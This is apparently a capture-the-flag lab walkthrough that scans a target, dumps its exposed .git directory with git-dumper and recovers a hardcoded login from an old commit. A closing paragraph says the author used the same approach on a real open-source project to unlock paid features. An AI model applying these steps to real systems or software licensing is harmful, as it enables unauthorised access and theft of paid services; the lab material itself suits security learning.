Copy $ nmap -sCV -Pn -oN nmap.txt [TARGET_IP]
$ cat nmap.txt
Nmap scan report for [TARGET_IP]
Host is up (0.40s latency ).
Not shown: 999 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.14.0 (Ubuntu)
| _http-title: Super Awesome Site!
| _http-server-header: nginx/1.14.0 (Ubuntu)
| http-git:
| [TARGET_IP] :80/.git/
| Git repository found!
| _ Repository description: Unnamed repository ; edit this file 'description' to name the...
Service Info: OS: Linux ; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Apr 14 22:04:47 2023 -- 1 IP address (1 host up) scanned in 118.95 seconds
Clone git directory to local machine
Copy mdkir git-repo && cd git-repo
Copy $ git-dumper http://10.10.49.172/.git/ .
[-] Testing http://10.10.49.172/.git/HEAD [200]
[-] Testing http://10.10.49.172/.git/ [200]
[-] Fetching .git recursively
[-] Fetching http://10.10.49.172/.git/ [200]
[-] Fetching http://10.10.49.172/.gitignore [404]
[-] http://10.10.49.172/.gitignore responded with status code 404
[-] Fetching http://10.10.49.172/.git/description [200]
[-] Fetching http://10.10.49.172/.git/index [200]
[-] Fetching http://10.10.49.172/.git/hooks/ [200]
[-] Fetching http://10.10.49.172/.git/refs/ [200]
[-] Fetching http://10.10.49.172/.git/config [200]
[-] Fetching http://10.10.49.172/.git/branches/ [200]
[-] Fetching http://10.10.49.172/.git/HEAD [200]
....
[-] Fetching http://10.10.49.172/.git/logs/refs/heads/master [200]
[-] Running git checkout .
Updated 7 paths from the index
Copy $ git log
commit d0b3578a628889f38c0affb1b75457146a4678e5 (HEAD - > master, tag: v1.0 )
Author: Adam Bertrand < hydragyrum@gmail.co m >
Date: Thu Jul 23 22:22:16 2020 +0000
Update .gitlab-ci.yml
commit 77aab78e2624ec9400f9ed3f43a6f0c942eeb82d
Author: Hydragyrum < hydragyrum@gmail.co m >
Date: Fri Jul 24 00:21:25 2020 +0200
add gitlab-ci config to build docker file.
....
commit 395e087334d613d5e423cdf8f7be27196a360459
Author: Hydragyrum < hydragyrum@gmail.co m >
Date: Thu Jul 23 23:17:43 2020 +0200
Made the login page, boss!
commit 2f423697bf81fe5956684f66fb6fc6596a1903cc
Author: Adam Bertrand < hydragyrum@gmail.co m >
Date: Mon Jul 20 20:46:28 2020 +0000
Initial commit
Copy git checkout 395e087334d613d5e423cdf8f7be27196a360459
Copy $ ls
README.md css dashboard.html index.html
Copy $ cat index.html
....
< script >
function login () {
let form = document.getElementById ( "login-form" );
console.log(form.elements );
let username = form.elements[ "username" ].value ;
let password = form.elements[ "password" ].value ;
if (
username === "admin" &&
password === "{{REDACTED}}"
) {
document.cookie = "login=1" ;
window.location.href = "/dashboard.html" ;
} else {
document.getElementById( "error" ).innerHTML =
"INVALID USERNAME OR PASSWORD!" ;
}
}
< /script >
< /body >
< /html >
From one of the open source project. The developers mistakenly commited paid services code block on their community edition git repo. I was able to reverse engineer the code block and avail those premium services π by making changes to the community edition codebase.